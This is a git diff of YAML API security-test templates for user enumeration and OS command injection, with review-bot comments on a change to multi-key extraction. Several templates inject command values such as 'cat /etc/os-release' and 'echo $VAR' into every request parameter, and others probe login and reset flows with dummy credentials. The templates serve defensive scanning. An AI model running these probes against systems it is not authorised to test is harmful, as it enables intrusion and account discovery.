99f4515c3..cc039186b 100644 --- a/Broken-User-Authentication/UserEnumerationAccountLock.yml +++ b/Broken-User-Authentication/UserEnumerationAccountLock.yml 
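Review bot: UserAgentCSRF.yml switches its filter to `extractMultiple: csrf_key` but has no hunk that updates where `csrf_key` is consumed, whereas every other file in this diff pairs the extraction change with a `${...}` key and `for_each_combination: true`. The execute section is outside the hunk, so how the test behaves when several keys contain `csrf` cannot be judged from the diff. Either update the consumer in the same commit or keep `extract: csrf_key` in this file until it is.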
@@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" execute: @@ -83,7 +83,8 @@ execute: requests: - req: - modify_body_param: - userKey: dummyUser@dummy.com + ${userKey}: dummyUser@dummy.com + for_each_combination: true - validate: response_code: gte: 400 @@ -100,7 +101,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummyUser@dummy.com + ${userKey}: dummyUser@dummy.com + for_each_combination: true - modify_header: ${roles_access_context.LOCKED_ACCOUNT_SYSTEM_ROLE}: 1 - validate: diff --git a/Broken-User-Authentication/UserEnumerationPasswordReset.yml b/Broken-User-Authentication/UserEnumerationPasswordReset.yml index e4090a02b..006f8f4ea 100644 --- a/Broken-User-Authentication/UserEnumerationPasswordReset.yml +++ b/Broken-User-Authentication/UserEnumerationPasswordReset.yml 
@@ -87,20 +87,21 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" - request_payload: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|passwd|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$|^code$|^token$" - extract: passKey + extractMultiple: passKey execute: type: multiple requests: - req: - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - validate: response_code: gte: 400 @@ -117,9 +118,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com + ${userKey}: dummymail@dummy.com + for_each_combination: true - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - validate: or: - response_code: @@ -136,9 +139,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com + ${userKey}: dummymail@dummy.com + for_each_combination: true - modify_body_param: - passKey: Default2! + ${passKey}: Default2! + for_each_combination: true - validate: or: - response_payload: diff --git a/Broken-User-Authentication/UserEnumerationRegistrationProcess.yml b/Broken-User-Authentication/UserEnumerationRegistrationProcess.yml index 81533fe65..ce16ae5ae 100644 --- a/Broken-User-Authentication/UserEnumerationRegistrationProcess.yml 
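Review bot: In UserEnumerationPasswordReset.yml (hunk @@ -87,20) the `passKey` pattern also matches `^secret$`, `^user_secret$`, `^code$` and `^token$`, and with `extractMultiple` every such field is now a target of `${passKey}: Default1!`. On a reset or registration request that carries a one-time code or token next to the password, overwriting that field would presumably produce a 4xx for an invalid token and not for a wrong password, so the baseline the later requests are compared against no longer reflects password handling. Restricting this file's pattern to password names by dropping `|^secret$|^user_secret$|^code$|^token$`, or keeping `extract: passKey`, avoids that. The same pattern with `extractMultiple` is used in UserEnumerationRegistrationProcess.yml, UserEnumerationResponseTime.yml, UserEnumerationViaResponseContent.yml and UsernameEnumerationRedirectPageAnalysis.yml.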
+++ b/Broken-User-Authentication/UserEnumerationRegistrationProcess.yml @@ -83,20 +83,21 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" - request_payload: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|passwd|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$|^code$|^token$" - extract: passKey + extractMultiple: passKey execute: type: multiple requests: - req: - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - validate: response_code: gte: 400 @@ -113,9 +114,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com + ${userKey}: dummymail@dummy.com + for_each_combination: true - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - validate: or: - response_payload: @@ -133,9 +136,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com + ${userKey}: dummymail@dummy.com + for_each_combination: true - modify_body_param: - passKey: Default2! + ${passKey}: Default2! + for_each_combination: true - validate: or: - response_payload: diff --git a/Broken-User-Authentication/UserEnumerationResponseTime.yml b/Broken-User-Authentication/UserEnumerationResponseTime.yml index 9a1197a1f..4d64ba25b 100644 --- a/Broken-User-Authentication/UserEnumerationResponseTime.yml 
+++ b/Broken-User-Authentication/UserEnumerationResponseTime.yml @@ -83,14 +83,14 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" - request_payload: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|passwd|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$|^code$|^token$" - extract: passKey + extractMultiple: passKey wordLists: invalidPasswords: - "Default1!" @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - passKey: ${invalidPasswords} + ${passKey}: ${invalidPasswords} + for_each_combination: true - validate: response_code: eq: 429 @@ -111,9 +112,11 @@ execute: - failure: x2 - req: - modify_body_param: - userKey: dummyemail@mail.com + ${userKey}: dummyemail@mail.com + for_each_combination: true - modify_body_param: - passKey: ${invalidPasswords} + ${passKey}: ${invalidPasswords} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/UserEnumerationViaResponseContent.yml b/Broken-User-Authentication/UserEnumerationViaResponseContent.yml index 7947a0821..bd00baa7d 100644 --- a/Broken-User-Authentication/UserEnumerationViaResponseContent.yml +++ b/Broken-User-Authentication/UserEnumerationViaResponseContent.yml 
@@ -81,20 +81,21 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" - request_payload: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|passwd|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$|^code$|^token$" - extract: passKey + extractMultiple: passKey execute: type: multiple requests: - req: - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - validate: or: - response_code: @@ -117,9 +118,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "dummymail@dummy.com" + ${userKey}: "dummymail@dummy.com" + for_each_combination: true - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - validate: response_payload: neq_obj: "${x1.response.body}" @@ -134,9 +137,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "dummymail@dummy.com" + ${userKey}: "dummymail@dummy.com" + for_each_combination: true - modify_body_param: - passKey: Default2! + ${passKey}: Default2! + for_each_combination: true - validate: response_payload: eq_obj: "${x2.response.body}" diff --git a/Broken-User-Authentication/UsernameEnumerationCaptchaEndpoint.yml b/Broken-User-Authentication/UsernameEnumerationCaptchaEndpoint.yml index 01baed8a3..e6efb6a92 100644 --- a/Broken-User-Authentication/UsernameEnumerationCaptchaEndpoint.yml 
+++ b/Broken-User-Authentication/UsernameEnumerationCaptchaEndpoint.yml @@ -82,20 +82,21 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" - request_payload: for_one: key: regex: "captcha" - extract: captchaKey + extractMultiple: captchaKey execute: type: multiple requests: - req: - modify_body_param: - captchaKey: "0000" + ${captchaKey}: "0000" + for_each_combination: true - validate: response_code: gte: 400 @@ -112,8 +113,9 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com - captchaKey: "0000" + ${userKey}: dummymail@dummy.com + ${captchaKey}: "0000" + for_each_combination: true - validate: response_payload: neq_obj: "${x1.response.body}" diff --git a/Broken-User-Authentication/UsernameEnumerationRedirectPageAnalysis.yml b/Broken-User-Authentication/UsernameEnumerationRedirectPageAnalysis.yml index 455f68898..e94224705 100644 --- a/Broken-User-Authentication/UsernameEnumerationRedirectPageAnalysis.yml +++ b/Broken-User-Authentication/UsernameEnumerationRedirectPageAnalysis.yml 
@@ -81,20 +81,21 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" - request_payload: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|passwd|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$|^code$|^token$" - extract: passKey + extractMultiple: passKey execute: type: multiple requests: - req: - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - modify_url: regex_replace: regex: https @@ -116,9 +117,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com + ${userKey}: dummymail@dummy.com + for_each_combination: true - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - modify_url: regex_replace: regex: https @@ -138,9 +141,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com + ${userKey}: dummymail@dummy.com + for_each_combination: true - modify_body_param: - passKey: Default2! + ${passKey}: Default2! + for_each_combination: true - modify_url: regex_replace: regex: https diff --git a/Command-Injection/CommandInjectionAmazonLinux.yml b/Command-Injection/CommandInjectionAmazonLinux.yml index 16aa8a9cd..ec4d361ec 100644 --- a/Command-Injection/CommandInjectionAmazonLinux.yml +++ b/Command-Injection/CommandInjectionAmazonLinux.yml 
@@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: @@ -121,9 +123,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "cat /etc/os-release" + ${changed_body_key}: "cat /etc/os-release" + for_each_combination: true - modify_query_param: - changed_query_key: "cat /etc/os-release" + ${changed_query_key}: "cat /etc/os-release" + for_each_combination: true - validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionBase64Encoding.yml b/Command-Injection/CommandInjectionBase64Encoding.yml index bd7dcb1ff..fa71f6603 100644 --- a/Command-Injection/CommandInjectionBase64Encoding.yml +++ b/Command-Injection/CommandInjectionBase64Encoding.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: 
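Review bot: CommandInjectionAmazonLinux.yml (hunk @@ -70,14) now combines `regex: .*` with `extractMultiple` for both body and query keys, and nothing in the file states how far that widens the test. As the flag name suggests, each request step would iterate every parameter of the selected API against every `${specialOSPayloads}` entry. A short comment above the filters, such as `# every body/query key is iterated; request count grows with matched keys x payloads`, would let an operator judge the load and side effects on the API under test before enabling the template. If some fields must stay intact for the request to be accepted (session or CSRF fields, for instance), the key pattern should exclude them. The other Command-Injection files in this diff share the filter.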
diff --git a/Command-Injection/CommandInjectionBase64EncodingChained.yml b/Command-Injection/CommandInjectionBase64EncodingChained.yml index 415f73a07..144fd901a 100644 --- a/Command-Injection/CommandInjectionBase64EncodingChained.yml +++ b/Command-Injection/CommandInjectionBase64EncodingChained.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionCentOS.yml b/Command-Injection/CommandInjectionCentOS.yml index 10c16da49..d67e28a49 100644 --- a/Command-Injection/CommandInjectionCentOS.yml +++ b/Command-Injection/CommandInjectionCentOS.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: 
@@ -121,9 +123,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "cat /etc/centos-release" + ${changed_body_key}: "cat /etc/centos-release" + for_each_combination: true - modify_query_param: - changed_query_key: "cat /etc/centos-release" + ${changed_query_key}: "cat /etc/centos-release" + for_each_combination: true - validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionCookieHeaderChained.yml b/Command-Injection/CommandInjectionCookieHeaderChained.yml index be56ded88..924e986e6 100644 --- a/Command-Injection/CommandInjectionCookieHeaderChained.yml +++ b/Command-Injection/CommandInjectionCookieHeaderChained.yml @@ -69,7 +69,7 @@ api_selection_filters: for_one: key: regex: "^Cookie$|^cookie$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -80,7 +80,8 @@ execute: requests: - req: - modify_header: - userKey: ${userVal}${specialOSPayloads} + ${userKey}: ${userVal}${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionCurl.yml b/Command-Injection/CommandInjectionCurl.yml index 185d525d1..a9dc323e6 100644 --- a/Command-Injection/CommandInjectionCurl.yml +++ b/Command-Injection/CommandInjectionCurl.yml @@ -72,14 +72,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -91,9 +91,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: 
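Review bot: In CommandInjectionCookieHeaderChained.yml the key is now collected with `extractMultiple: userKey`, but the value is still a single `extract: userVal`, and the request builds `${userKey}: ${userVal}${specialOSPayloads}`. When more than one key matches, the diff does not show whether `${userVal}` follows the key being modified or stays at one extracted value, so a header could be sent with another header's original value in front of the payload. Either extract the value per key as well, or add a comment such as `# NOTE: userVal is extracted once; confirm it matches each userKey`. The same key/value split is in the MultipartFormData and UserAgent header files. It matters most under the `.*` key filter of the NoSQLi and TimeBasedNoSQLi files, which prepend `${changed_body_value}` / `${changed_query_value}` to the payload.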
diff --git a/Command-Injection/CommandInjectionCurlHTTPRequestWithChainedCommands.yml b/Command-Injection/CommandInjectionCurlHTTPRequestWithChainedCommands.yml index 549d0ce0d..9658766ba 100644 --- a/Command-Injection/CommandInjectionCurlHTTPRequestWithChainedCommands.yml +++ b/Command-Injection/CommandInjectionCurlHTTPRequestWithChainedCommands.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionMacOS.yml b/Command-Injection/CommandInjectionMacOS.yml index 4bf80bf3f..3036d7dbd 100644 --- a/Command-Injection/CommandInjectionMacOS.yml +++ b/Command-Injection/CommandInjectionMacOS.yml @@ -71,14 +71,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -93,9 +93,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: 
diff --git a/Command-Injection/CommandInjectionMultipartFormDataHeaderChained.yml b/Command-Injection/CommandInjectionMultipartFormDataHeaderChained.yml index 3a6bc4474..678752414 100644 --- a/Command-Injection/CommandInjectionMultipartFormDataHeaderChained.yml +++ b/Command-Injection/CommandInjectionMultipartFormDataHeaderChained.yml @@ -69,7 +69,7 @@ api_selection_filters: for_one: key: regex: "^Content-Type$|^content-type$" - extract: userKey + extractMultiple: userKey value: regex: "multipart/form-data" extract: userVal @@ -82,7 +82,8 @@ execute: requests: - req: - modify_header: - userKey: ${userVal}${specialOSPayloads} + ${userKey}: ${userVal}${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionRHEL.yml b/Command-Injection/CommandInjectionRHEL.yml index 46e6a7c1a..38f1a3fcb 100644 --- a/Command-Injection/CommandInjectionRHEL.yml +++ b/Command-Injection/CommandInjectionRHEL.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: 
@@ -122,9 +124,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "cat /etc/redhat-release" + ${changed_body_key}: "cat /etc/redhat-release" + for_each_combination: true - modify_query_param: - changed_query_key: "cat /etc/redhat-release" + ${changed_query_key}: "cat /etc/redhat-release" + for_each_combination: true - validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionTimeDelay.yml b/Command-Injection/CommandInjectionTimeDelay.yml index f5b7ceeda..9beba74a1 100644 --- a/Command-Injection/CommandInjectionTimeDelay.yml +++ b/Command-Injection/CommandInjectionTimeDelay.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -128,9 +128,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Command-Injection/CommandInjectionTimeDelayWithChainedCommands.yml b/Command-Injection/CommandInjectionTimeDelayWithChainedCommands.yml index 724cd47a2..91694b412 100644 --- a/Command-Injection/CommandInjectionTimeDelayWithChainedCommands.yml +++ b/Command-Injection/CommandInjectionTimeDelayWithChainedCommands.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value 
@@ -129,9 +129,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Command-Injection/CommandInjectionUbuntu.yml b/Command-Injection/CommandInjectionUbuntu.yml index 83ad11b1a..c0c887233 100644 --- a/Command-Injection/CommandInjectionUbuntu.yml +++ b/Command-Injection/CommandInjectionUbuntu.yml @@ -77,14 +77,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -99,9 +99,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionUserAgentHeaderChained.yml b/Command-Injection/CommandInjectionUserAgentHeaderChained.yml index 301835acb..d6eb1fbd6 100644 --- a/Command-Injection/CommandInjectionUserAgentHeaderChained.yml +++ b/Command-Injection/CommandInjectionUserAgentHeaderChained.yml @@ -69,7 +69,7 @@ api_selection_filters: for_one: key: regex: "^User-Agent$|^user-agent$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -81,7 +81,8 @@ execute: requests: - req: - modify_header: - userKey: ${userVal}${specialOSPayloads} + ${userKey}: ${userVal}${specialOSPayloads} + for_each_combination: true validate: response_payload: length: 
diff --git a/Command-Injection/CommandInjectionVariableAssignChainedCommands.yml b/Command-Injection/CommandInjectionVariableAssignChainedCommands.yml index 3312f989f..249430be2 100644 --- a/Command-Injection/CommandInjectionVariableAssignChainedCommands.yml +++ b/Command-Injection/CommandInjectionVariableAssignChainedCommands.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: @@ -118,9 +120,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "echo $VAR" + ${changed_body_key}: "echo $VAR" + for_each_combination: true - modify_query_param: - changed_query_key: "echo $VAR" + ${changed_query_key}: "echo $VAR" + for_each_combination: true - validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionVariableAssignment.yml b/Command-Injection/CommandInjectionVariableAssignment.yml index 7e5121119..2be2e6340 100644 --- a/Command-Injection/CommandInjectionVariableAssignment.yml +++ b/Command-Injection/CommandInjectionVariableAssignment.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value 
@@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: @@ -118,9 +120,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "echo $VAR" + ${changed_body_key}: "echo $VAR" + for_each_combination: true - modify_query_param: - changed_query_key: "echo $VAR" + ${changed_query_key}: "echo $VAR" + for_each_combination: true - validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionWithParameters.yml b/Command-Injection/CommandInjectionWithParameters.yml index a1ec71f3d..1de4c5b19 100644 --- a/Command-Injection/CommandInjectionWithParameters.yml +++ b/Command-Injection/CommandInjectionWithParameters.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -98,9 +98,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionWithRedirectionAndVarManipulation.yml b/Command-Injection/CommandInjectionWithRedirectionAndVarManipulation.yml index 8127b4cdc..8f4e1740a 100644 --- a/Command-Injection/CommandInjectionWithRedirectionAndVarManipulation.yml +++ b/Command-Injection/CommandInjectionWithRedirectionAndVarManipulation.yml 
